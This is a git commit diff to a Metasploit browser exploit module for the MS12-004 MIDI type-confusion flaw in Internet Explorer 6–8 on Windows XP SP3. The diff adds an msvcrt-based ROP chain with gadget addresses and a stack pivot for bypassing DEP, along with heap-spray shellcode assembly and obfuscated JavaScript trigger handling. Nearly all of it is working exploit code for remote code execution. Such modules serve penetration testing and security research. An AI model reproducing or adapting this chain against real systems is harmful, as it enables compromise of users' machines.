Add msvcrt ROP target for IE8

2012-03-01 15:23:41 -06:00 · 2012-03-01 15:23:41 -06:00 · 5a5e5eab95
parent 1bc99646e7
commit 5a5e5eab95
1 changed files with 97 additions and 53 deletions
--- a/modules/exploits/windows/browser/ms12_004_midi.rb
+++ b/modules/exploits/windows/browser/ms12_004_midi.rb
@ -28,10 +28,10 @@ class Metasploit3 < Msf::Exploit::Remote
 				(CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects,
 				which leverages remote code execution under the context of the user.
-				Note: At this time, for IE 8 target, JRE (Java Runtime Environment) is required
+				Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the
-				to bypass DEP (Data Execution Prevention).
+				msvcrt ROP to bypass DEP (Data Execution Prevention).
-				Also note: Based on our testing, the vulnerability does not seem to trigger when
+				Also, based on our testing, the vulnerability does not seem to trigger when
 				the victim machine is operated via rdesktop.
 			},
 			'License'        => MSF_LICENSE,
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					'Shane Garrett',  #Initial discovery (IBM X-Force)
 					'juan vazquez',
-					'sinn3r',
+					'sinn3r'
 				],
 			'References'     =>
 				[
@ -65,30 +65,43 @@ class Metasploit3 < Msf::Exploit::Remote
 					[
 						'IE 6 on Windows XP SP3',
 						{
-							'Rop' => false,
+							'Rop' => nil,
 							'DispatchDst' => 0x0c0c0c0c
 						}
 					],
 					[
 						'IE 7 on Windows XP SP3',
 						{
-							'Rop' => false,
+							'Rop' => nil,
 							'DispatchDst' => 0x0c0c0c0c
 						}
 					],
 					[
-						'IE 8 on Windows XP SP3',
+						'IE 8 on Windows XP SP3 with JRE ROP',
 						{
 							# xchg ecx,esp
 							# or byte ptr [eax],al
 							# add byte ptr [edi+5Eh],bl
 							# ret 8
 							# From IMAGEHLP
-							'Rop' => true,
+							'Rop' => :msvcr71,
 							'StackPivot' => 0x76C9B4C2,
 							'DispatchDst' => 0x0c0c1be4
 						}
 					],
 					[
 						'IE 8 on Windows XP SP3 with msvcrt',
 						{
 							# xchg ecx,esp
 							# or byte ptr [eax],al
 							# add byte ptr [edi+5Eh],bl
 							# ret 8
 							# From IMAGEHLP
 							'Rop' => :msvcrt,
 							'StackPivot' => 0x76C9B4C2,
 							'DispatchDst' => 0x0c0c1bd0
 						}
 					]
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Jan 10 2012",
@ -217,7 +230,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if datastore['OBFUSCATE']
 			trigger = ::Rex::Exploitation::JSObfu.new(trigger)
 			trigger.obfuscate
-			trigger_fn = find_trigger_fn(trigger.to_s)
+			trigger_fn = trigger.sym("trigger")
 		end
 		html = %Q|
@ -261,10 +274,15 @@ class Metasploit3 < Msf::Exploit::Remote
 	def build_spray(my_target)
 		# Extract string based on target
-		if my_target.name == 'IE 8 on Windows XP SP3'
+		if my_target.name =~ /JRE ROP$/
 			js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
 			js_shellcode = "var shellcode =  nops.substring(0,0x800 - code.length) + code;"
 		elsif my_target.name =~ /msvcrt$/
 			js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
 			js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;"
 		else
 			js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
 			js_shellcode = "var shellcode =  nops.substring(0,0x800 - code.length) + code;"
 		end
 		# Build shellcode based on Rop requirement
@ -290,7 +308,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		while (nops.length < 0x1000) nops+= nops;
-		var shellcode =  nops.substring(0,0x800 - code.length) + code;
+		#{js_shellcode}
 		while (shellcode.length < 0x40000) shellcode += shellcode;
@ -339,7 +357,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	# 5. Force the using of the confused tagVARIANT.
 	def build_trigger(my_target)
-		if my_target.name == 'IE 8 on Windows XP SP3'
+		if my_target.name =~ /IE 8 on Windows XP SP3/
 			# Redoing the feng shui if fails makes it reliable
 			js_trigger = <<-JSTRIGGER
@ -411,16 +429,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		return trigger
 	end
 	def find_trigger_fn(trigger)
 		fns = trigger.scan(/function ([a-zA-Z0-9_]+)\(\)/)
 		if fns.nil? or fns.empty?
 			return "trigger"
 		else
 			return fns.last.first
 		end
 		return "trigger"
 	end
 	def junk(n=1)
 		tmp = []
 		value = rand_text(4).unpack("L")[0].to_i
@ -428,42 +436,78 @@ class Metasploit3 < Msf::Exploit::Remote
 		return tmp
 	end
-	# ROP chain copied from ms11_050_mshtml_cobjectelement.rb (generated by mona)
+	def nop
-	# Added a little of roping to adjust the stack pivoting for this case
+		return make_nops(4).unpack("L")[0].to_i
-	# Specific for IE8 XP SP3 case at this time
+	end
 	def create_rop_chain(my_target)
-		rop_gadgets =
+		pivot = my_target['StackPivot']
-		[
+
-			0x7c347f98,  # RETN (ROP NOP) [msvcr71.dll]
+		case my_target['Rop']
-			my_target['StackPivot'],  # stackpivot
+		when :msvcrt
-			junk, # padding
+			rop_gadgets = 
-			0x7c376402,  # POP EBP # RETN [msvcr71.dll]
+			[
-			0x7c376402,  # skip 4 bytes [msvcr71.dll]
+				0x77c539ee,  # RETN
-			0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
+				pivot,
-			0xfffff800,  # Value to negate, will become 0x00000201 (dwSize)
+				junk,
-			0x7c351e05,  # NEG EAX # RETN [msvcr71.dll]
+				0x77c4e392,  # POP EAX # RETN
-			0x7c354901,  # POP EBX # RETN [msvcr71.dll]
+				0x77c11120,  # <- *&VirtualProtect()
-			0xffffffff,
+				0x77c2e493,  # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
-			0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll]
+				junk,
-			0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
+				0x77c2dd6c,
-			0x7c344f87,  # POP EDX # RETN [msvcr71.dll]
+				0x77c4ec00,  # POP EBP # RETN
-			0xffffffc0,  # Value to negate, will become 0x00000040
+				0x77c35459,  # ptr to 'push esp #  ret'
-			0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]
+				0x77c47705,  # POP EBX # RETN
-			0x7c34d201,  # POP ECX # RETN [msvcr71.dll]
+				0x00000400,  # <- change size to mark as executable if needed (-> ebx)
-			0x7c38b001,  # &Writable location [msvcr71.dll]
+				0x77c3ea01,  # POP ECX # RETN
-			0x7c34b8d7,  # POP EDI # RETN [msvcr71.dll]
+				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
-			0x7c347f98,  # RETN (ROP NOP) [msvcr71.dll]
+				0x77c46100,  # POP EDI # RETN 
-			0x7c364802,  # POP ESI # RETN [msvcr71.dll]
+				0x77c46101,  # ROP NOP (-> edi)
-			0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
+				0x77c4d680,  # POP EDX # RETN
-			0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
+				0x00000040,  # newProtect (0x40) (-> edx)
-			0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
+				0x77c4e392,  # POP EAX # RETN
-			0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
+				nop,         # NOPS (-> eax)
-			0x7c345c30,  # ptr to 'push esp #  ret ' [msvcr71.dll]
+				0x77c12df9,  # PUSHAD # RETN
-		].flatten.pack('V*')
+			].flatten.pack("V*")
 		when :msvcr71
 			rop_gadgets =
 			[
 				0x7c347f98,  # RETN (ROP NOP)
 				pivot,       # stackpivot
 				junk,        # padding
 				0x7c376402,  # POP EBP # RETN
 				0x7c376402,  # skip 4 bytes
 				0x7c347f97,  # POP EAX # RETN
 				0xfffff800,  # Value to negate, will become 0x00000201 (dwSize)
 				0x7c351e05,  # NEG EAX # RETN
 				0x7c354901,  # POP EBX # RETN
 				0xffffffff,
 				0x7c345255,  # INC EBX # FPATAN # RETN
 				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
 				0x7c344f87,  # POP EDX # RETN
 				0xffffffc0,  # Value to negate, will become 0x00000040
 				0x7c351eb1,  # NEG EDX # RETN
 				0x7c34d201,  # POP ECX # RETN
 				0x7c38b001,  # &Writable location
 				0x7c34b8d7,  # POP EDI # RETN
 				0x7c347f98,  # RETN (ROP NOP)
 				0x7c364802,  # POP ESI # RETN
 				0x7c3415a2,  # JMP [EAX]
 				0x7c347f97,  # POP EAX # RETN
 				0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF (IAT)
 				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN
 				0x7c345c30,  # ptr to 'push esp #  ret'
 			].flatten.pack('V*')
 		end
 		return rop_gadgets
 	end
 end
 =begin
 6367893A   FF51 04          CALL DWORD PTR DS:[ECX+4]
 =end